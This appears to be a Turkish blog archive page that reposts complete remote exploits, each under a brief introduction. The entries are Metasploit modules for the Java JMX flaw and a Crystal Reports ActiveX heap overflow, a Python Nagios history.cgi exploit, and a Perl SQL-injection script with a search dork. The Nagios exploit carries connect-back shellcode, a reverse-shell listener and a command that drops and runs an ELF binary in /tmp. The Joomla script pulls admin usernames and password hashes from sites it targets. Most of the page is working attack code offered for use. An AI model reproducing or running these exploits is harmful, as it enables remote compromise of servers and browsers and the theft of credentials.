Archive for Remote Exploits

Java Applet JMX Remote Code Execution

Java Applet JMX uzaktan kod çalışmırma açığı bulundu. Açık metesploit tarafından bulunmuş olup, açığı ilişkin exploit aşağıdadır.


## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. #   <a href="http://metasploit.com/">http://metasploit.com/</a> ##

require 'msf/core' require 'rex'

class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn  autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,    'Name'          => 'Java Applet JMX Remote Code Execution',    'Description'   => %q{      This module abuses the JMX classes from a Java Applet to run arbitrary Java     code outside of the sandbox as exploited in the wild in January of 2013. The     vulnerability affects Java version 7u10 and earlier.    },    'License'       => MSF_LICENSE,    'Author'        =>     [      'Unknown', # Vulnerability discovery      'egypt', # Metasploit module      'sinn3r', # Metasploit module      'juan vazquez' # Metasploit module     ],    'References'    =>     [      [ 'CVE', '2013-0422' ],      [ 'US-CERT-VU', '625617' ],      [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],      [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],      [ 'URL', 'http://pastebin.com/cUG2ayjh' ]  #Who authored the code on pastebin?  I can't read Russian 🙁     ],    'Platform'      => [ 'java', 'win', 'osx', 'linux' ],    'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },    'Targets'       =>     [      [ 'Generic (Java Payload)',       {        'Platform' => ['java'],        'Arch' => ARCH_JAVA,       }      ],      [ 'Windows x86 (Native Payload)',       {        'Platform' => 'win',        'Arch' => ARCH_X86,       }      ],      [ 'Mac OS X x86 (Native Payload)',       {        'Platform' => 'osx',        'Arch' => ARCH_X86,       }      ],      [ 'Linux x86 (Native Payload)',       {        'Platform' => 'linux',        'Arch' => ARCH_X86,       }      ],     ],    'DefaultTarget'  => 0,    'DisclosureDate' => 'Jan 10 2013'   ))  end

def setup   path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")   @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }   path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")   @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

@exploit_class_name = rand_text_alpha("Exploit".length)   @exploit_class.gsub!("Exploit", @exploit_class_name)   super  end

def on_request_uri(cli, request)   print_status("handling request for #{request.uri}")

case request.uri   when /\.jar$/i    jar = payload.encoded_jar    jar.add_file("<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>", @exploit_class)    jar.add_file("B.class", @loader_class)    metasploit_str = rand_text_alpha("metasploit".length)    payload_str = rand_text_alpha("payload".length)    jar.entries.each { |entry|     entry.name.gsub!("metasploit", metasploit_str)     entry.name.gsub!("Payload", payload_str)     entry.data = entry.data.gsub("metasploit", metasploit_str)     entry.data = entry.data.gsub("Payload", payload_str)    }    jar.build_manifest

send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })   when /\/$/    payload = regenerate_payload(cli)    if not payload     print_error("Failed to generate the payload.")     send_not_found(cli)     return    end    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })   else    send_redirect(cli, get_resource() + '/', '')   end

end

def generate_html   html  = %Q|<html><head><title>Download</title></head>|   html += %Q|<body><center><p>Loading, Please Wait...</p></center>|   html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>" width="1" height="1">|   html += %Q|</applet></body></html>|   return html  end

end

Nagios history.cgi Remote Command Execution Vulnerability

nagios-history

Nagios history.cgi Remote Command Execution Açığı Bulundu. Açık için aşağıdaki python exploit yazılmış olup, uzaktan (remote) back connect yapılarak servere ulaşım imkanı mevcut. Açık bulucunun açığın kullanımı hakkındaki yazmış olduğu python exploit aşağıdaki gibidir.

#!/usr/bin/python

#

# CVE-2012-6096 - Nagios history.cgi Remote Command Execution

# ===========================================================

# Another year, another reincarnation of classic and trivial

# bugs to exploit. This time we attack Nagios.. or more

# specifically, one of its CGI scripts. [1]

#

# The Nagios code is an amazing monster. It reminds me a

# lot of some of my early experiments in C, back when I

# still had no clue what I was doing. (Ok, fair enough,

# I still don't, heheh.)

#

# Ok, I'll come clean. This exploit doesn't exactly

# defeat FORTIFY. This approach is likely to work just FINE

# on other crippled distro's though, think of stuff like

# ArchLinux, Slackware, and all those Gentoo kids twiddling

# their CFLAGS. [2] (Oh and hey, BSD and stuff!)

#

# I do some very stupid shit(tm) here that might make an

# exploit coder or two cringe. My sincere apologies for that.

#

# Cold beer goes out to my friends who are still practicing

# this dying but interesting type of art:

#

#   * brainsmoke * masc * iZsh * skier_ * steve *

#

# -- blasty <blasty@fail0verflow.com> / 2013-01-08

#

# References:

# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109

# [2] http://www.funroll-loops.info/

#

# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!

# Next time you rebrand an exploit at least show some diligence and

# add some additional targets or improvements, so we can all profit!

#

# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!

#

import os, sys, socket, struct, urllib, threading, SocketServer, time

from base64 import b64encode

SocketServer.TCPServer.allow_reuse_address = True

targets = [

    {

        "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",

        "smash_len"  : 0xc37,

        "unescape"   : 0x0804b620,

        "popret"     : 0x08048fe4,

        "hostbuf"    : 0x080727a0,

        "system_plt" : 0x08048c7c

    }

]

def u32h(v):

    return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):

    return struct.pack("<L", v)     # Tiny ELF stub based on:  # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html   def make_elf(sc):      elf_head = \          "7f454c46010101000000000000000000" + \          "02000300010000005480040834000000" + \          "00000000000000003400200001000000" + \          "00000000010000000000000000800408" + \          "00800408" + u32h(0x54+len(sc))*2  + \          "0500000000100000"         return elf_head.decode("hex") + sc     # interactive connectback listener  class connectback_shell(SocketServer.BaseRequestHandler):      def handle(self):          print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]

        print "[**] This shell is powered by insane amounts of illegal substances"

        s = self.request

        import termios, tty, select, os

        old_settings = termios.tcgetattr(0)

        try:

            tty.setcbreak(0)

            c = True

            os.write(s.fileno(), "id\nuname -a\n")

            while c:

                for i in select.select([0, s.fileno()], [], [], 0)[0]:

                    c = os.read(i, 1024)

                    if c:

                        if i == 0:

                            os.write(1, c)

                        os.write(s.fileno() if i == 0 else 1, c)

        except KeyboardInterrupt: pass

        finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)

        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):

    pass

if len(sys.argv) != 5:

    print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"

    print "  >> \"Jetzt geht's Nagi-los!\"\n"

    print "  usage: %s <base_uri>   \n" % (sys.argv[0])

    print "  targets:"

    i = 0

    for target in targets:

        print " %02d) %s" % (i, target['name'])

        i = i+1

    print ""

    sys.exit(-1)

target_no = int(sys.argv[4])

if target_no < 0 or target_no > len(targets):

    print "Invalid target specified"

    sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener

server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)

server_thread = threading.Thread(target=server.serve_forever)

server_thread.daemon = True

server_thread.start()

# shellcode to be executed

# vanilla x86/linux connectback written by a dutch gentleman

# close to a decade ago.

cback = \

    "31c031db31c951b10651b10151b10251" + \

    "89e1b301b066cd8089c231c031c95151" + \

    "68badc0ded6668b0efb102665189e7b3" + \

    "1053575289e1b303b066cd8031c939c1" + \

    "740631c0b001cd8031c0b03f89d3cd80" + \

    "31c0b03f89d3b101cd8031c0b03f89d3" + \

    "b102cd8031c031d250686e2f7368682f" + \

    "2f626989e3505389e1b00bcd8031c0b0" + \

    "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))

cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..

# yes, even with the unescape() call in our return-chain..

# initially I was going to use some /dev/tcp based connectback..

# but /dev/tcp isn't available/accesible everywhere, so instead

# we drop an ELF into /tmp and execute that. The '>' characters

# also doesn't survive the trip so we work around this by using

# the tee(1) utility.

# If your target has a /tmp that is mounted with noexec flag,

# is severely firewalled or guarded by trained (watch)dogs..

# you might want to reconsider this approach!

cmd  = \

    "rm -rf /tmp/x;" + \

    "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \

    "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+' 🙁

# so apply some olde trick and rely on $IFS for argv separation

cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.

# We return into cgi_input_unescape() to get rid of

# URL escaping in a static buffer we control, and then

# we return into system@plt for the moneyshot.

#

# Ergo sum:

# There's no memoryleak or whatever needed to leak libc

# base and bypass ASLR.. This entire Nagios PoS is stringed

# together by system() calls, so pretty much every single one

# of their little silly binaries comes with a PLT entry for

# system(), huzzah!

rop = [

    u32(target['unescape']),

    u32(target['popret']),

    u32(target['hostbuf']),

    u32(target['system_plt']),

    u32(0xdeafbabe),

    u32(target['hostbuf'])

]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot

# out of the box. Building HTTP requests from scratch is so 90ies..

params = urllib.urlencode({

    'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)

})

print "[>>] CL1Q .."

f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)

print "[>>] CL4Q .."

f.read()

# TRIAL PERIOD ACTIVE, LOL!

time.sleep(0x666)

server.shutdown()

Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass

internet Explorer 8 versiyonunda tehlikeli bir açık bulundu.
Exploiti açmaya antivirler izin vermediğinden exploit eklenmemiştir.
Açığın tanıtımı şu şekilde.

 
<!-- 
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass 
** Author: sickness@offsec.com 
** Thanks to Ryujin and Dookie for their help. 

#################################################################### 

** Affected Software: Internet Explorer 8 

** Vulnerability: Fixed Col Span ID 

** CVE: CVE-2012-1876 

** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb 

** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php 

** Tested on Windows 7 (x86) - IE 8.0.7601.17514 
#################################################################### 

** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak 🙂  

** To get it working on a different version of Windows you will require to make your own chances to the exploit 🙂  
** Have fun 🙂 
--> 

Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow

Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow exploit.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => NormalRanking,
		:classid    => "{88DD90B6-C770-4CFF-B7A4-3AFD16BB8824}",
		:method     => "ServerResourceVersion"
	})


	def initialize(info={})
		super(update_info(info,
			'Name'           => "Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",
			'Description'    => %q{
					This module exploits a heap based buffer overflow in the CrystalPrintControl
				ActiveX, while handling the ServerResourceVersion property. The affected control
				can be found in the PrintControl.dll component as included with Crystal Reports
				2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3
				and IE 8 on Windows 7 SP1. The module uses the msvcr71.dll library, loaded by the
				affected ActiveX control, to bypass DEP and ASLR.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Dmitriy Pletnev', # Vulnerability discovery
					'Dr_IDE', # PoC
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2010-2590' ],
					[ 'OSVDB', '69917' ],
					[ 'BID', '45387' ],
					[ 'EDB', '15733' ]
				],
			'Payload'        =>
				{
					'Space' => 890,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'PrependEncoder' => "\x81\xc4\xa4\xf3\xfe\xff" # Stack adjustment # add esp, -500
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Using jre rop because msvcr71.dll is installed with the ActiveX control
					# Crystal Reports 2008 / PrintControl.dll 12.0.0.683
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3',
						{
							'Rop' => nil,
							'Offset' => '0x5F4',
							'Ret' => 0x0c0c0c08
						}
					],
					[ 'IE 7 on Windows XP SP3',
						{
							'Rop' => nil,
							'Offset' => '0x5F4',
							'Ret' => 0x0c0c0c08
						}
					],
					[ 'IE 8 on Windows XP SP3',
						{
							'Rop' => :jre,
							'Offset' => '0x5f4',
							'Ret' => 0x0c0c0c0c,
							'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
						}
					],
					[ 'IE 8 on Windows 7',
						{
							'Rop' => :jre,
							'Offset' => '0x5f4',
							'Ret' => 0x0c0c0c0c,
							'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 14 2010",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

		ie_name = "IE #{ie}"

		case nt
		when '5.1'
			os_name = 'Windows XP SP3'
		when '6.0'
			os_name = 'Windows Vista'
		when '6.1'
			os_name = 'Windows 7'
		end

		targets.each do |t|
			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
				print_status("Target selected as: #{t.name}")
				return t
			end
		end

		return nil
	end

	def ie_heap_spray(my_target, p)
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		# Land the payload at 0x0c0c0c0c
		# For IE 6, 7, 8
		js = %Q|
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");
		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{my_target['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);
		heap_obj.gc();
		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}
		var overflow = nops.substring(0, 10);
		|

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		return js
	end

	def get_payload(t, cli)
		code = payload.encoded

		# No rop. Just return the payload.
		return code if t['Rop'].nil?

		# Both ROP chains generated by mona.py - See corelan.be
		print_status("Using JRE ROP")
		rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})

		return rop_payload
	end

	def load_exploit_html(my_target, cli)
		p  = get_payload(my_target, cli)
		js = ie_heap_spray(my_target, p)

		# This rop chain can't contain NULL bytes, because of this RopDB isn't used
		# rop chain generated with mona.py
		rop_gadgets =
			[
				0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
				0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
				0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
				0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
				0xffffffff,	#
				0x7c376402,	# skip 4 bytes [msvcr71.dll]
				0x7c351e05,	# NEG EAX # RETN [msvcr71.dll]
				0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll]
				0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
				0x7c344f87,	# POP EDX # RETN [msvcr71.dll]
				0xffffffc0,	# Value to negate, will become 0x00000040
				0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll]
				0x7c34d201,	# POP ECX # RETN [msvcr71.dll]
				0x7c38b001,	# &Writable location [msvcr71.dll]
				0x7c347f97,	# POP EAX # RETN [msvcr71.dll]
				0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
				0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
			].pack("V*")

		# Allow to easily stackpivot to the payload
		# stored on the sprayed heap
		stackpivot_to_spray = %Q|
			mov esp, 0x0c0c0c10
			ret
		|

		# Space => 0x940 bytes
		# 0x40c: Fill the current CrystalPrintControl object
		# 0x8: Overflow next heap chunk header
		# 0x52c: Overflow next CrystalPrintControl object until the ServerResourceVersion offset
		bof = rand_text_alpha(1036)
		bof << [0x01010101].pack("V") # next heap chunk header
		bof << [0x01010101].pack("V") # next heap chunk header
		bof << [my_target.ret].pack("V")
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71 # eip for w7 sp0 / ie8
		bof << rop_gadgets
		bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, stackpivot_to_spray).encode_string
		bof << rand_text_alpha(0x940 - bof.length)

		js_bof = Rex::Text.to_unescape(bof, Rex::Arch.endian(my_target.arch))

		target = rand_text_alpha(5 + rand(3))
		target2 = rand_text_alpha(5 + rand(3))
		target3 = rand_text_alpha(5 + rand(3))
		target4 = rand_text_alpha(5 + rand(3))
		target5 = rand_text_alpha(5 + rand(3))
		target6 = rand_text_alpha(5 + rand(3))
		target7 = rand_text_alpha(5 + rand(3))
		target8 = rand_text_alpha(5 + rand(3))
		target9 = rand_text_alpha(5 + rand(3))
		target10 = rand_text_alpha(5 + rand(3))
		target11 = rand_text_alpha(5 + rand(3))
		target12 = rand_text_alpha(5 + rand(3))
		target13 = rand_text_alpha(5 + rand(3))
		target14 = rand_text_alpha(5 + rand(3))
		target15 = rand_text_alpha(5 + rand(3))

		# - 15 CrystalPrintControl objects are used to defragement the heap.
		# - The 10th CrystalPrintControl is overflowed.
		# - After the overflow, trying to access the overflowed object, control
		# can be obtained.
		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object id='#{target}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target2}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target3}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target4}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target5}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target6}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target7}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target8}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target9}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target10}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target11}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target12}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target13}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target14}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target15}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<script>
		var ret = unescape('#{js_bof}');
		#{target9}.ServerResourceVersion = ret;
		var c = #{target10}.BinName.length;
		</script>
		</body>
		</html>
		|

		return html
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		uri   = request.uri
		print_status("Requesting: #{uri}")

		my_target = get_target(agent)
		# Avoid the attack if no suitable target found
		if my_target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		html = load_exploit_html(my_target, cli)
		html = html.gsub(/^\t\t/, '')
		print_status("Sending HTML...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

end

Joomla commedia Remote Exploit

joomla commedime eklentisinde sql injection açığı bulunmuş olup, Joomla commedia Remote perl Exploit ve açık hakkındaki açıklamalar şu şekildedir.

 Exploit Title: Joomla commedia Remote Exploit

 dork: inurl:index.php?option=com_commedia
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
  
 Vendor: http://www.ecolora.org/
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers
 
 License: Commercial and Non-Commercial, affects 2 versions

 Demo: http://www.ecolora.org/index.php/demo/commedia

 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
    ########################################
    # Joomla Component (commedia) Remote SQL Exploit
    #----------------------------------------------------------------------------#
    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Opciones de prefijo tabla users:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jml_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="muc_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="sgj_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012